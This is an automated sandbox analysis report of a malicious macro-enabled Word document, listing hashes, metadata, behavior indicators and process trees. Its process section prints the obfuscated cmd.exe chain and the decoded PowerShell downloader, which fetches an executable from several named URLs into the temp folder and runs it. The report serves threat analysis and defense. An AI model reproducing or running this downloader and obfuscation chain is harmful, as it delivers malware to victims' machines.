analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

d757b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0

Full analysis: https://app.any.run/tasks/032e3158-34eb-44cb-b4e8-7ebbac56284a
Verdict: Malicious activity
Analysis date: December 06, 2018, 07:04:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 4 06:23:00 2018, Last Saved Time/Date: Tue Dec 4 06:23:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 43, Security: 0
MD5:

94F8CC67F0979B25B8B129DF872F9822

SHA1:

62C5533F74A3D4F5EC2D224CEA5481BD3D932B30

SHA256:

D757B7954BBC570FE19AB1EA593FFFB3B492E69C15232E2329134A1B01BC29E0

SSDEEP:

1536:XeHocn1kp59gxBK85fBt+a9BMlfbuhv0Ivi:Xt41k/W48sShM8i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2948)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2948)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2396)
      • cmd.exe (PID: 3860)
    • Application launched itself

      • cmd.exe (PID: 2396)
      • cmd.exe (PID: 3860)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2948)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 49
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 43
Words: 7
Pages: 1
ModifyDate: 2018:12:04 06:23:00
CreateDate: 2018:12:04 06:23:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\d757b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3860c:\GXYNiHuIXdvR\sRXUolPj\WpptJsd\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b/+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=_HQfUL3JQ/IYsRv$z05;\j(ly{iWVyJD'^|.$ur= 5='m^>jaeA(EtaACITOi-ZCWeI?JkL\0oYEsv8dpnK)yIEi^<{X*V %NV)N^|k0Ho^|0X;Y0aX.034/8Xc] ,q2ei^>=g~Hn-:29 skdhA=wt]BMgm`(n{v\eEVgl.p=.*d5) 7hlR_bWJc^&Dk1w$D/] JfNmaV?e+c0t,VzI`:s-(=^>tJx{e=ZRG_Lz(L7t(Xo{ AK[f-R}I%kD;d)M'28HTL-_b,vaAxEz'^<=h=I:jO1}0v_tqs{.j$AwM;/GV)cAel;)`WWCDDI(N$TiM 3u\,J$inF9,m[wWu+g=$0g^<(42Ue~ {lsGFi1-8F`0fdvYFam-Ao4'~l%MJnnitwmVeoM@(D0:Z.SgpD;$Zs4CLi'.`$u*H{fNjyI.er%CMtom {^|So)4{cP{L^>Kw?ao~:f$#Ab \xnn@fiit\G NL]n_C,mw(/uj#X$.kN($9-h$6*cv_oa6- e#5Pr45Koo}Nf73';noK'x'je:*nxNm^<e8g..P{.'gh$+UyBzZ:?q\t*B}^&5$#% +9=v'AfY\VGh'Kkn+BGSpiFLmeZpegO9tB#n:$2JvO [nbsxeE+-$^<9:=ltMl%*LWNk0DVfY$krv;\`C'wsiRl('q5%=B89f'c}'=?I3h.aKY1%#swfv$U3P;]q^|'q4X4#@80Onl5{:c'q/t LOU=EgS /N=z^|}HqP'CB*B,$;Ah;DbY'i#:z?r5n(5Ef[a,';x4=rvYKRW$j7wGC(-T$Mvk;\mk) uU'Li?@P`w'0W((J80t$^&*i$28leWqp;fYSrh}.pA('}lmXkS+qEuKuB}UJBJ755c#EP^>NT]{^&MV^<NU`J9/8J_m^<x]ojqJcu\:.9[kownht:viu.=oaG#Qn?zbcpMse6#itJ]t/dBl/wuF:@%*pK\:tJRItP=~hl:S@guYA'NWLJHYM^>GesctkPn\?Z@Znbl(QofB.y@*?/.l1tZeie7zpnJdM.X-.6h$ol,t]a~Cwrtl]u^&E/akhS/oPe/./$:]R}pWlHt.BltFE^&h^>7P@f]-vv^>YLvN)Cs9ei+ymd,g^<7*v,6B(sE*RYZ7Zw/m9smhXuo0z1cc?^>.?5~yT@-o?{_b4TNnxF9i;fua'):h5%9c3i6/kw^>/6:n:h9lpx;htDJit,OUhD;@@^|74UOfLpWe-iR6aB{VPt=r+55w`Q^&btmWe[/kfKm-f#oUXtcu/A.D.^>rKuieEIut;[Bh1^</g8RCif/gr:iSb:f,niV+r0t@u#V/bW%K/r^&Y/rs_:L6'prEut+h,tS`Ohvf8@\0NG}8JT+itgOkJB7)H3=40ik`b0')9/K%=m]\:oWG#c\F$.YKAa{SRr_f[a~AhiO79c`m2yUmeb2_b/G+U/S8+:#WvprcAt^&GMt/o-h^>Rg'B4x=p\+PCGUK)rao xa$p%';z}gt.eCnBl_eJF9iyT\l)QDCx[zbC{}e}LPWSb[.871tsY+ewU[Nmhx $85tAvkc@*UeqyNj4zpb`uMosw,-,\jwpnHe6{Wn:kG=2~FDj4asX91i[(-$\AY;V9n'oaBs5/Kf.O2VdEC'f`{=^>jLlj;cw0;4m.^>'f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %6 in (1735,-4,3)do set 5O=!5O!!iC:~%6,1!&&if %6 leq 3 echo !5O:~4! |%TMP:~-17,1%ower%ProgramW6432:~-1%hel%CommonProgramFiles(x86):~13,-21% -" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
255
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2396CmD /V/C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b/+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=_HQfUL3JQ/IYsRv$z05;\j(ly{iWVyJD'^|.$ur= 5='m^>jaeA(EtaACITOi-ZCWeI?JkL\0oYEsv8dpnK)yIEi^<{X*V %NV)N^|k0Ho^|0X;Y0aX.034/8Xc] ,q2ei^>=g~Hn-:29 skdhA=wt]BMgm`(n{v\eEVgl.p=.*d5) 7hlR_bWJc^&Dk1w$D/] JfNmaV?e+c0t,VzI`:s-(=^>tJx{e=ZRG_Lz(L7t(Xo{ AK[f-R}I%kD;d)M'28HTL-_b,vaAxEz'^<=h=I:jO1}0v_tqs{.j$AwM;/GV)cAel;)`WWCDDI(N$TiM 3u\,J$inF9,m[wWu+g=$0g^<(42Ue~ {lsGFi1-8F`0fdvYFam-Ao4'~l%MJnnitwmVeoM@(D0:Z.SgpD;$Zs4CLi'.`$u*H{fNjyI.er%CMtom {^|So)4{cP{L^>Kw?ao~:f$#Ab \xnn@fiit\G NL]n_C,mw(/uj#X$.kN($9-h$6*cv_oa6- e#5Pr45Koo}Nf73';noK'x'je:*nxNm^<e8g..P{.'gh$+UyBzZ:?q\t*B}^&5$#% +9=v'AfY\VGh'Kkn+BGSpiFLmeZpegO9tB#n:$2JvO [nbsxeE+-$^<9:=ltMl%*LWNk0DVfY$krv;\`C'wsiRl('q5%=B89f'c}'=?I3h.aKY1%#swfv$U3P;]q^|'q4X4#@80Onl5{:c'q/t LOU=EgS /N=z^|}HqP'CB*B,$;Ah;DbY'i#:z?r5n(5Ef[a,';x4=rvYKRW$j7wGC(-T$Mvk;\mk) uU'Li?@P`w'0W((J80t$^&*i$28leWqp;fYSrh}.pA('}lmXkS+qEuKuB}UJBJ755c#EP^>NT]{^&MV^<NU`J9/8J_m^<x]ojqJcu\:.9[kownht:viu.=oaG#Qn?zbcpMse6#itJ]t/dBl/wuF:@%*pK\:tJRItP=~hl:S@guYA'NWLJHYM^>GesctkPn\?Z@Znbl(QofB.y@*?/.l1tZeie7zpnJdM.X-.6h$ol,t]a~Cwrtl]u^&E/akhS/oPe/./$:]R}pWlHt.BltFE^&h^>7P@f]-vv^>YLvN)Cs9ei+ymd,g^<7*v,6B(sE*RYZ7Zw/m9smhXuo0z1cc?^>.?5~yT@-o?{_b4TNnxF9i;fua'):h5%9c3i6/kw^>/6:n:h9lpx;htDJit,OUhD;@@^|74UOfLpWe-iR6aB{VPt=r+55w`Q^&btmWe[/kfKm-f#oUXtcu/A.D.^>rKuieEIut;[Bh1^</g8RCif/gr:iSb:f,niV+r0t@u#V/bW%K/r^&Y/rs_:L6'prEut+h,tS`Ohvf8@\0NG}8JT+itgOkJB7)H3=40ik`b0')9/K%=m]\:oWG#c\F$.YKAa{SRr_f[a~AhiO79c`m2yUmeb2_b/G+U/S8+:#WvprcAt^&GMt/o-h^>Rg'B4x=p\+PCGUK)rao xa$p%';z}gt.eCnBl_eJF9iyT\l)QDCx[zbC{}e}LPWSb[.871tsY+ewU[Nmhx $85tAvkc@*UeqyNj4zpb`uMosw,-,\jwpnHe6{Wn:kG=2~FDj4asX91i[(-$\AY;V9n'oaBs5/Kf.O2VdEC'f`{=^>jLlj;cw0;4m.^>'f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %6 in (1735,-4,3)do set 5O=!5O!!iC:~%6,1!&&if %6 leq 3 echo !5O:~4! |power%ProgramW6432:~-1%hel%CommonProgramFiles(x86):~13,-21% -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
255
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2456C:\Windows\system32\cmd.exe /S /D /c" echo $mwl='Vfs';$isD=new-object Net.WebClient;$oKP='http://byciara.com/0i3BgTG@http://burnbrighter.com/mQ5tBipU@http://chainboy.com/ZE67diCLv@http://aural6.net/yobZPsMLA@http://tecnauto.com/UMTE5JuqX'.Split('@');$CjK='fnz';$Bqz = '504';$sYh='BqR';$DWl=$env:temp+'\'+$Bqz+'.exe';foreach($umn in $oKP){try{$isD.DownloadFile($umn, $DWl);$svO='AbT';If ((Get-Item $DWl).length -ge 80000) {Invoke-Item $DWl;$YJf='QSJ';break;}}catch{}}$CtL='wlP'; "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 173
Read events
839
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6C09.tmp.cvr
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5E2041FDA144453159427A44F1671FF2
SHA256:DADC67B011C595DC89FECEA682D77EFF235948180174F716411FB54E49BF309A
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$57b7954bbc570fe19ab1ea593fffb3b492e69c15232e2329134a1b01bc29e0.docpgc
MD5:65022AF5A51C3BEE12E731C531C02C24
SHA256:58EF79BD6F8213001F2DD81A5D500D34759AB5B4C2861C922B72DF0792E56606
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info